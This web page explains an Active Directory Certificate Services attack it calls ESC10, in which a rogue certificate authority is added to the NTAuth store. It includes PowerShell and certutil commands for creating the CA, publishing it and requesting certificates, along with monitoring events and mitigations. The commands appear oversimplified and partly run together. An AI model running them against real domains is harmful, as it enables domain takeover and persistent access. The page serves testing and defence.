ESC10: Rogue Certificate Authority
ESC10 involves an attacker creating a rogue Certificate Authority and adding it to the enterprise NTAuth store, potentially allowing the issuance of trusted certificates for any purpose.
ESC10 is a sophisticated attack where an attacker creates a rogue Certificate Authority (CA) and manages to add it to the enterprise NTAuth store. This store determines which CAs are trusted for authentication within the domain. Once added, the attacker can issue certificates that will be trusted by all domain resources, potentially leading to complete domain compromise.
Learn more about AD CS defense strategies to protect against this and other attacks.
- Issuance of fully trusted certificates by an attacker
- Potential for complete domain compromise
- Man-in-the-middle attacks against domain resources
- Long-term persistence and evasion capabilities
- Create a rogue Certificate Authority
- Gain access to modify the enterprise NTAuth store
- Add the rogue CA to the NTAuth store
- Issue malicious certificates from the rogue CA
- Use these certificates for authentication and further attacks
When conducting AD CS penetration testing, consider the following aspects specific to ESC10: Rogue Certificate Authority:
- Identify vulnerable certificate templates and misconfigurations
- Assess the potential impact on the overall AD CS security
- Evaluate the effectiveness of existing security controls
- Test for the ability to exploit this vulnerability in the target environment
- Document findings and provide actionable remediation steps
Create a new Certificate Authority
New-SelfSignedCertificate -DnsName "Rogue CA" -CertStoreLocation "Cert:\LocalMachine\My" -KeyUsage CertSign -KeyExportPolicy Exportable -NotAfter (Get-Date).AddYears(10)Export the CA certificate
$cert = Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -eq "CN=Rogue CA"}Export-Certificate -Cert $cert -FilePath C:\RogueCA.cerAdd the rogue CA to the NTAuth store
certutil -dspublish -f C:\RogueCA.cer NTAuthCAIssue a certificate from the rogue CA
certreq -submit -attrib "CertificateTemplate:User" -config "Rogue CA" request.inf- Regularly audit the enterprise NTAuth store for unauthorized changes
- Monitor for the addition of new Certificate Authorities in the domain
- Implement alerting for changes to critical PKI infrastructure
- Use security information and event management (SIEM) tools to correlate PKI-related events
- Conduct periodic security assessments of the entire PKI infrastructure
- 5137: A directory service object was created (for monitoring new CA objects)
- 4886: Certificate Services approved a certificate request
- 4887: Certificate Services denied a certificate request
- 4896: One or more rows have been added to the certificate database
To mitigate ESC10: Rogue Certificate Authority and enhance overall AD CS security, consider implementing the following measures:
- Strictly control access to the enterprise NTAuth store
- Regular audit of trusted root CAs in the domain
- Implement strong change management for PKI infrastructure
- Use security descriptors to limit who can manage the NTAuth store
- Implement and maintain a robust certificate revocation process
- Regularly conduct AD CS penetration testing to identify and address vulnerabilities
- Implement the principle of least privilege across your AD CS infrastructure
- Maintain up-to-date documentation of your AD CS configuration and security policies
Related AD CS Attacks
Explore other attack vectors that target Active Directory Certificate Services:
